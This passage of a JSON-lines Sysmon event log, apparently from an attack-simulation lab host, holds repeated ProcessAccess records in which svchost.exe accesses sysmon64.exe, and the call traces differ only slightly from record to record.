\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1803,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1804,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1805,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1806,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1807,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1808,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1809,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1810,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-